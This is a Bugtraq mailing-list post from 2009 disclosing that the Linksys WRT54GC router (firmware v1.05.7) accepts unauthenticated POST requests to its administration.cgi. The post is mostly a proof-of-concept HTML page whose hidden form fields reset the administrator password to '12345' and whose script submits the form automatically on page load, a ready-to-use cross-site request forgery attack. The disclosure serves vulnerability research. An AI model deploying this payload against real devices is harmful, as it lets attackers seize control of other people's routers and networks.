[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200904190448.n3J4m9dt011037@www3.securityfocus.com>
Date: Sat, 18 Apr 2009 22:48:09 -0600
From: gabriel@...andodeseguranca.com
To: bugtraq@...urityfocus.com
Subject: Linksys WRT54GC - Admin Password Change (POC)
<!--
***************
* Gabriel Lima - gabriel@...andodeseguranca.com
* www.falandodeseguranca.com
***************
(English:)
Linksys WRT54GC - Administration Password Change
The Router WRT54GC doesn't seem to check authentication from the administrator in it's .CGI files, accepting any POST request,
as a password change. Below, follows an example of a form that changes the password and administrator login to '12345'.
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration
(Português:)
Linksys WRT54GC - Mudança de Senha
O roteador WRT54GC parece não verificar a autenticação do administrador em seus arquivos .CGI, aceitando qualquer envio
de POST como o de mudança de senha. Abaixo, um exemplo de formulário que muda a senha e o login de administrador para 12345.
Testado no modelo Linksys WRT54GC - Firmware Version: v1.05.7 - Administração Local e remota.
Credits:
Gabriel Lima. gabriel@...andodeseguranca.com
-->
<html><body>
<form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>
<!-- Código de envio automático do formulário -->
<SCRIPT language="JavaScript">
document.senha.submit();
</SCRIPT>
</body></html>
Powered by blists - more mailing lists